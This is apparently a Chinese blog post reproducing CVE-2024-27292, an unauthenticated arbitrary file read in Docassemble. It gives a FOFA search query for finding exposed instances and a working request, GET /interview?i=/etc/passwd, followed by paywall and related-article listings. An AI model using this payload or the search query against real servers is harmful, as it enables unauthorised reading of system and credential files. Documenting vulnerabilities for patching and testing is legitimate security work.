Docassemble存在任意文件读取任意文件读取漏洞CVE-2024-27292

最新推荐文章于 2024-07-12 09:42:30 发布
最新推荐文章于 2024-07-12 09:42:30 发布
阅读量189 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 前端 网络安全 安全性测试 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/140336882
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. Docassemble简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

Docassemble是Jonathan Pyle个人开发者的一个免费的开源专家系统,用于指导访谈和文档组装。

2.漏洞描述

Docassemble是Jonathan Pyle个人开发者的一个免费的开源专家系统,用于指导访谈和文档组装。Docassemble 1.4.53至1.4.96版本存在安全漏洞,该漏洞源于允许攻击者通过操作URL获得对系统信息的未授权的访问。

CVE编号:CVE-2024-27292

CNNVD编号:CNNVD-202403-2105

CNVD编号:

3.影响版本

Docassemble 1.4.53至1.4.96版本

Docassemble存在任意文件读取任意文件读取漏洞

4.fofa查询语句

icon_hash="-575790689"

5.漏洞复现

漏洞链接:https://xxx.xxxx.xxxx.xxx/interview?i=/etc/passwd

漏洞数据包:

GET /interview?i=/etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.x
了解本专栏 订阅专栏 解锁全文 超级会员免费看
sublime88
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Docassemble interview 未授权任意文件读取漏洞复现(CVE-2024-27292)
0xSec
07-08 559
Docassemble interview 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
CVE-2024-27292Docassemble任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
07-11 331
Docassemble是Jonathan Pyle个人开发者的一个免费的开源专家系统,用于指导访谈和文档组装。Docassemble 1.4.53至1.4.96版本存在安全漏洞,该漏洞源于允许攻击者通过操作URL获得对系统信息的未授权的访问导致任意文件读取
推荐开源神器:docassemble——智能化文档组装系统
gitblog_00066的博客
05-18 522
推荐开源神器:docassemble——智能化文档组装系统 项目地址:https://gitcode.com/jhpyle/docassemble 1、项目介绍 在文档处理领域,docassemble 是一款强大的开源工具,它让自动化生成和定制复杂法律文档变得易如反掌。通过这个平台,用户可以构建交互式访谈,收集必要的信息,并自动生成符合需求的文件。无论你是律师、行政助理还是研究人员,docasse...
docassemble-spen0171:docassemble扩展
04-04
docassemble.spen0171 docassemble扩展。 作者 劳拉·斯宾塞(Laura Spencer),
docassemble-template-builder-addin:Microsoft Word加载项(2013+),可帮助为Docassemble.org指导的采访构建模板
05-13
Docassemble模板生成器 这是一个Microsoft Word加载项(2013+),可帮助为指导的采访构建模板。 测试很容易! 要在Microsoft Word Online中测试此采访,请执行以下操作: 打开Word Online(例如,从OneDrive或SharePoint内部)。 下载 通过插入|安装插件。 Office加载项,然后管理我的加载项| 上载加载项 单击文档组装图标以打开加载项的侧边栏。 输入运行版本> 0.2.64的Docassemble服务器的地址 如果您想为外接程序做出贡献 请与Jonathan或Quinten联系以获取提交更改的权限。 首次下载并生成: git clone https://github.com/GBLS/docassemble-template-builder-addin cd docassemble-template-bui
漏洞复现】Docassemble interview 未授权任意文件读取漏洞(CVE-2024-27292)
最新发布
siu~
07-12 431
Docassemble interview 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
CVE-2024-23897 JenKins任意文件读取漏洞复现
m0_70489261的博客
02-27 1847
Jenkins提供了一个命令行的接口,用户可以在下载一个命令行客户端jenkins-cli.jar到本地,并调用该客户端来执行一些Jenkins的功能。
Jenkins任意文件读取漏洞(CVE-2024-23897)复现
fly夏天的博客
01-30 1243
Jenkins任意文件读取漏洞(CVE-2024-23897)复现
Jenkins任意文件读取CVE-2024-23897)
qq_51175992的博客
03-11 876
Jenkins是一个开源的自动化服务器。Jenkins使用args4j来解析命令行输入,并支持通过HTTP、Websocket等协议远程传入命令行参数。args4j中用户可以通过@字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件。该漏洞影响Jenkins 2.441及以前的版本。
docassemble-class:基于开源平台Docassemble的法学院课程材料-Source material
03-24
docassemble类 基于开源平台Docassemble的法学院课程材料
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
CVE-2024-23897 JenKins任意文件读取漏洞复现(1)
2401_84519960的博客
05-16 630
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等。
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将...
Tomcat 文件读取漏洞(CVE-2020-1938) 如何处理
09-09
对于Tomcat文件读取漏洞CVE-2020-1938),以下是一些处理方法: 1. 更新Tomcat版本:确保您使用的Tomcat版本已修复了该漏洞。Apache官方发布了修复程序的Tomcat版本,您应该升级到最新版本。 2. 配置安全限制:为Tomcat配置适当的安全限制,以防止未经授权的访问。您可以通过修改Tomcat的配置文件来限制对敏感文件的访问。 3. 配置访问控制:使用Tomcat的访问控制功能,限制对敏感文件和目录的访问。您可以在Tomcat的配置文件中定义访问规则,仅允许授权用户访问。 4. 使用防火墙和网络安全设备:在网络层面上使用防火墙和其他网络安全设备,限制对Tomcat服务器的直接访问,并监控网络流量以检测任何异常活动。 5. 定期更新和监控:确保定期更新Tomcat服务器,并密切监控系统日志和网络流量以及其他安全事件。及时发现并应对潜在的漏洞和入侵尝试。 这些是一些常见的处理方法,但请注意,具体的处理方法可能因您的环境和需求而异。建议在采取任何措施之前,您应该进行充分的测试,并根据您的具体情况来制定适合您的安全策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值